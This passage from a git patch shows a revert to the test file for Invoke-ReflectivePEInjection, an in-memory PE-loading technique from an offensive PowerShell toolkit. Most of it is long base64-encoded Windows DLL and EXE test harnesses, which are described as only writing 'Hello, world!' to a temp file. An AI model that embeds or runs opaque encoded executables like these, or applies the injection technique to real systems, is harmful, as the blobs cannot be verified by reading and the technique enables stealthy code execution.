AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0IgAAwiIAAN4iAADqIgAA/CIAABAjAABsJQAAXCUAAEIlAAAsJQAAFiUAAPwkAADsJAAAgCUAAAAAAACaIwAAriMAALwjAADIIwAA1CMAAN4jAACEIwAA/iMAADAkAAA4JAAAQiQAAFAkAABeJAAAaCQAAHokAACKJAAApCQAALokAADUJAAAeiMAAHIjAABqIwAAWCMAAEgjAAA6IwAALCMAAOojAAAAAAAAAAAAAM8RQAAAAAAAAAAAABYRQADNFUAAyhNAAAAAAAAAAAAAUDBAAKAwQAAlVEVNUCUAAHN0cmNhdAAAAAAAAG50ZGxsAAAAXHRlc3RvdXRwdXQudHh0AEhlbGxvLCB3b3JsZCEgAAAgAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP7///8AAAAA1P///wAAAAD+////LxNAAEMTQAAAAAAA/v///wAAAADY////AAAAAP7////JFEAA3BRAAAAAAAD+////AAAAAMz///8AAAAA/v///wAAAACmFkAACCIAAAAAAAAAAAAAHiMAAAAgAABEIgAAAAAAAAAAAAAiJAAAPCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtCIAAMIiAADeIgAA6iIAAPwiAAAQIwAAbCUAAFwlAABCJQAALCUAABYlAAD8JAAA7CQAAIAlAAAAAAAAmiMAAK4jAAC8IwAAyCMAANQjAADeIwAAhCMAAP4jAAAwJAAAOCQAAEIkAABQJAAAXiQAAGgkAAB6JAAAiiQAAKQkAAC6JAAA1CQAAHojAAByIwAAaiMAAFgjAABIIwAAOiMAACwjAADqIwAAAAAAAIgAQ3JlYXRlRmlsZUEAHAFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBACUFV3JpdGVGaWxlAEUCR2V0UHJvY0FkZHJlc3MAABUCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAGsBX1hjcHRGaWx0ZXIAFwJfYW1zZ19leGl0AAC2AV9fZ2V0bWFpbmFyZ3MA8gFfX3NldF9hcHBfdHlwZQAATgZleGl0AACDAl9leGl0AC8CX2NleGl0AABAAl9jb25maWd0aHJlYWRsb2NhbGUA9AFfX3NldHVzZXJtYXRoZXJyAAANA19pbml0dGVybV9lAAwDX2luaXR0ZXJtALcBX19pbml0ZW52AKICX2Ztb2RlAAA/Al9jb21tb2RlAAA1AT90ZXJtaW5hdGVAQFlBWFhaAKkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAlANfbG9jawAEBV91bmxvY2sALgJfY2FsbG9jX2NydACuAV9fZGxsb25leGl0ADoEX29uZXhpdAAUA19pbnZva2Vfd2F0c29uAABDAl9jb250cm9sZnBfcwAAegJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgBQAl9jcnRfZGVidWdnZXJfaG9vawAArAFfX2NydFVuaGFuZGxlZEV4Y2VwdGlvbgCrAV9fY3J0VGVybWluYXRlUHJvY2VzcwDqAEVuY29kZVBvaW50ZXIApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDBAUdldEN1cnJlbnRQcm9jZXNzSWQAxQFHZXRDdXJyZW50VGhyZWFkSWQAAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAygBEZWNvZGVQb2ludGVyAAADSXNEZWJ1Z2dlclByZXNlbnQABANJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA/v////////9O5kC7sRm/RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAABEAQAACjATMB0wIjAnMDAwNzBXMGQwmzCoMLMw7zD/MB4xKjEwMUIxTDFVMV8xZTFuMXQxeTF+MYMxizGQMaIxqjGwMbwxxzHQMdox4THnMewx8TH2MfsxATIJMh0yNzJXMmkycTJ2MnsynTKjMqoyrzK8Mssy0zLbMu8y9TL6MgIzCDMOMxszITMrM0ozUDNaM2AzaTNuM8sz2jPgM0Y0SzRdNHs0jzSVNEA1WzVnNXY1fzWMNbs1wzXPNeA16zXwNfU1DDYbNiE2NDZJNlQ2ajaENo42yjbPNuo27zYwNzY3QTdeN6k3rje+N8Q3yjfQN9Y33DfiN+g3+DcBOAg4GzhTOFk4XzhlOGs4cTh4OH84hjiNOJQ4mziiOKo4sji6OMY4zzjUONo45DjuOP44DjkeOSc5Njk8OUI5SDkAAAAgAAAgAAAAsDC8MMAwxDDQMNQwVDGEMYgxpDGoMcgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 
 	$WideStrDllBytes32 = [Convert]::FromBase64String($Encoded32BitWStringDll)
 	$StrDllBytes32 = [Convert]::FromBase64String($Encoded32BitStringDll)
-- 
cgit v1.2.3


From 52c46b1d3a9b61122bdc4553665c7a56ac8744a1 Mon Sep 17 00:00:00 2001
From: Matt Graeber <mattgraeber@gmail.com>
Date: Thu, 17 Dec 2015 20:30:04 -0800
Subject: Revert "Invoke-ReflectivePEInjection test harnesses updated"

This reverts commit 98ebc1b0b8b64d069d34d80c128aa226b5e8416f.
---
 Tests/CodeExecution.tests.ps1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

(limited to 'Tests')

diff --git a/Tests/CodeExecution.tests.ps1 b/Tests/CodeExecution.tests.ps1
index 514cb91..2771e78 100644
--- a/Tests/CodeExecution.tests.ps1
+++ b/Tests/CodeExecution.tests.ps1
@@ -225,11 +225,11 @@ Describe 'Invoke-ReflectivePEInjection' {
 
 	# A bare bones test harness DLL that simply writes "Hello, world!" to %TEMP%\testoutput.txt upon having VoidFunc called
 	$Encoded64BitVoidDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABxqgfBNctpkjXLaZI1y2mSPLP6kjbLaZI1y2iSM8tpkheyjZI0y2mSF7K1kjTLaZIXsreSNMtpklJpY2g1y2mSAAAAAAAAAABQRQAAZIYDAKZ8PlYAAAAAAAAAAPAAIiALAgwAAAIAAAAEAAAAAAAAABAAAAAQAAAAAACAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAABAAAAABAAAlVEAAAEAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAkCAAAF0AAADwIAAAKAAAAAAAAAAAAAAAADAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAACUBAAAAEAAAAAIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAADIAQAAACAAAAACAAAABgAAAAAAAAAAAAAAAAAAQAAAQC5wZGF0YQAADAAAAAAwAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgBAAAAw8zMzMzMzMzMzMxMi9xTSIHsYAEAAIsFFxAAAPIPEAUXEAAASI0NLBAAAEGJQwgPtwUBEAAA8g8RRCRAZkGJQwwPtgXxDwAAQYhDDosF8Q8AAIlEJEgPtwXqDwAAZolEJEz/FasPAABIjRXcDwAASIvI/xWTDwAASIvYSIXAD4STAAAASI1UJFBIjYwkcAEAAEG4AgEAAP8VXg8AAIXAdHZMjQW7DwAASI1MJFC6AgEAAP/ThcB1X0jHRCQwAAAAAESNQAdIjUwkUEUzyboAAABAx0QkKIAAAADHRCQgAgAAAP8VOw8AAEiL2EiFwHQnRTPJSI1UJEBIi8hFjUEOSMdEJCAAAAAA/xX1DgAASIvL/xUEDwAASIHEYAEAAFvDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXiEAAAAAAAB6IQAAAAAAAIYhAAAAAAAAmCEAAAAAAACsIQAAAAAAAFAhAAAAAAAAAAAAAAAAAAAlVEVNUCUAAEhlbGxvLCB3b3JsZCEAAABzdHJjYXRfcwAAAABudGRsbAAAAAAAAABcdGVzdG91dHB1dC50eHQAAQsDAAsBLAAEMAAAAAAAAAAAAAAAAAAAAAAAAKZ8PlYAAAAAwiAAAAEAAAABAAAAAQAAALggAAC8IAAAwCAAABAQAADkIAAAAABSZWZsZWN0aXZlUEVJbmplY3RUZXN0SGFybmVzcy5kbGwAVm9pZEZ1bmMAAAAAGCEAAAAAAAAAAAAAuiEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF4hAAAAAAAAeiEAAAAAAACGIQAAAAAAAJghAAAAAAAArCEAAAAAAABQIQAAAAAAAAAAAAAAAAAAiABDcmVhdGVGaWxlQQAiAUV4cGFuZEVudmlyb25tZW50U3RyaW5nc0EANAVXcml0ZUZpbGUATAJHZXRQcm9jQWRkcmVzcwAAGwJHZXRNb2R1bGVIYW5kbGVBAABSAENsb3NlSGFuZGxlAEtFUk5FTDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAAJREAAHggAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
-	$Encoded32BitVoidDll = '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'
+	$Encoded32BitVoidDll = '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'
 
 	# A bare bones test harness EXE that simply writes "Hello, world! (EXE ARGS)" to %TEMP%\testoutput.txt
 	$Encoded64BitExe = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADVAnyTkWMSwJFjEsCRYxLA1zLPwJNjEsDXMvLAnmMSwNcy88CTYxLAmBuBwJJjEsCRYxPAs2MSwLMa9sCQYxLAsxrMwJBjEsBSaWNokWMSwAAAAAAAAAAAAAAAAAAAAABQRQAAZIYFAIC2PlYAAAAAAAAAAPAAIgALAgwAAAoAAAAOAAAAAAAAMBQAAAAQAAAAAABAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAABgAAAABAAAAAAAAAMAYIEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUIwAAPAAAAAAAAAAAAAAAAEAAAOQAAAAAAAAAAAAAAABQAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwIQAAcAAAAAAAAAAAAAAAACAAACABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAADsIAAAAEAAAAAoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC8BgAAACAAAAAIAAAADgAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAgAAAAAAwAAAAAgAAABYAAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAAOQAAAAAQAAAAAIAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAUAAAAAFAAAAACAAAAGgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA